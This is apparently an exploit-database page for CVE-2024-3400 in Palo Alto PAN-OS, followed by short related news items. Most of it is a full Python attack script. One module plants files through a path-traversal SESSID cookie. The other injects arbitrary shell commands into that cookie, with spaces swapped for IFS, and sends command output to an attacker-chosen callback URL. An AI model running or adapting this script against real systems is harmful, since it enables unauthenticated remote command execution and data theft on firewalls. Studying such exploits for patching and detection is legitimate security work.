Headline
Palo Alto PAN-OS Command Execution / Arbitrary File Creation
Palo Alto PAN-OS versions prior to 11.1.2-h3 command injection and arbitrary file creation exploit.
# Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation# Date: 21 Apr 2024# Exploit Author: Kr0ff# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400# Software Link: -# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 # PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1# PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1# Tested on: Debian# CVE : CVE-2024-3400#!/usr/bin/env python3import systry: import argparse import requestsexcept ImportError: print("Missing dependencies, either requests or argparse not installed") sys.exit(2)# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis # https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/def check_vuln(target: str, file: str) -> bool: ret = False uri = "/ssl-vpn/hipreport.esp" s = requests.Session() r = "" headers = { "User-Agent" : \ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0 "Content-Type": "application/x-www-form-urlencoded", "Cookie": \ f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}" } headers_noCookie = { "User-Agent" : \ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0 } if not "http://" or not "https://" in target: target = "http://" + target try: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) except requests.exceptions.Timeout or requests.ConnectionError as e: print(f"Request timed out for \"HTTP\" !{e}") print("Trying with \"HTTPS\"...") target = "https://" + target try: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) except requests.exceptions.Timeout or requests.ConnectionError as e: print(f"Request timed out for \"HTTPS\"") sys.exit(1) else: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) if r.status_code == 200: r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 ) if r.status_code == 403: print("Target vulnerable to CVE-2024-3400") ret = True else: return ret return ret def cmdexec(target: str, callback_url: str, payload: str) -> bool: ret = False p = "" if " " in payload: p = payload.replace(" ", "${IFS)") uri = "/ssl-vpn/hipreport.esp" headers = { "User-Agent" : \ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0 "Content-Type": "application/x-www-form-urlencoded", "Cookie": \ f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`" } s = requests.Session() r = "" if not "http://" or not "https://" in target: target = "http://" + target try: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) except requests.exceptions.Timeout or requests.ConnectionError as e: print(f"Request timed out for \"HTTP\" !{e}") print("Trying with \"HTTPS\"...") target = "https://" + target try: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) except requests.exceptions.Timeout or requests.ConnectionError as e: print(f"Request timed out for \"HTTPS\"") sys.exit(1) else: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) if not "Success" in r.text: return ret else: ret = True return ret#Initilize parser for argumentsdef argparser(selection=None): parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' ) subparser = parser.add_subparsers( help="Available modules", dest="module") exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script") exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True ) exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True ) exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True ) #--------------------------------------- check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" ) check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True ) check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True ) args = parser.parse_args(selection) args = parser.parse_args(args=None if sys.argv[1:] else ["-h"]) if args.module == "exploit": cmdexec(args.target, args.callbackurl, args.payload) if args.module == "check": check_vuln(args.target, args.filename)if __name__ == "__main__": argparser() print("Finished !")
Related news
U.S. cybersecurity and intelligence agencies have called out an Iranian hacking group for breaching multiple organizations across the country and coordinating with affiliates to deliver ransomware. The activity has been linked to a threat actor dubbed Pioneer Kitten, which is also known as Fox Kitten, Lemon Sandstorm (formerly Rubidium), Parisite, and UNC757, which it described as connected to
Read the full article for key points from Intruder’s VP of Product, Andy Hornegold’s recent talk on exposure management. If you’d like to hear Andy’s insights first-hand, watch Intruder’s on-demand webinar. To learn more about reducing your attack surface, reach out to their team today. Attack surface management vs exposure management Attack surface management (ASM) is the ongoing
Unknown threat actors have been observed leveraging open-source tools as part of a suspected cyber espionage campaign targeting global government and private sector organizations. Recorded Future's Insikt Group is tracking the activity under the temporary moniker TAG-100, noting that the adversary likely compromised organizations in at least ten countries across Africa, Asia, North America,
By Waqas The Llama Drama vulnerability in the Llama-cpp-Python package exposes AI models to remote code execution (RCE) attacks, enabling attackers to steal data. Currently, over 6,000 models are affected by this vulnerability. This is a post from HackRead.com Read the original post: AI Python Package Flaw ‘Llama Drama’ Threatens Software Supply Chain
Though PAN originally described the attacks exploiting the vulnerability as being limited, they are increasingly growing in volume, with more exploits disclosed by outside parties.
Growing attacks targeting the flaw prompted CISA to include it in the known exploited vulnerabilities catalog earlier this month.
This Metasploit module exploits two vulnerabilities in Palo Alto Networks PAN-OS that allow an unauthenticated attacker to create arbitrarily named files and execute shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or GlobalProtect Portal enabled and telemetry collection on (default). Multiple versions are affected. Payloads may take up to one hour to execute, depending on how often the telemetry service is set to run.
By Cyber Newswire Zero Knowledge Networking vendor shrugs off firewall flaw! This is a post from HackRead.com Read the original post: Xiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)
By cybernewswire Las Vegas, United States, April 17th, 2024, CyberNewsWire Zero Knowledge Networking vendor shrugs off firewall flaw In the… This is a post from HackRead.com Read the original post: Xiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)
Palo Alto OS was recently hit by a command injection zero day attack. These are exploitation details related to the zero day.
A sophisticated threat actor is leveraging the bug to deploy a Python backdoor for stealing data and executing other malicious actions.
By Deeba Ahmed Firewall on fire! This is a post from HackRead.com Read the original post: Palo Alto Patches 0-Day (CVE-2024-3400) Exploited by Python Backdoor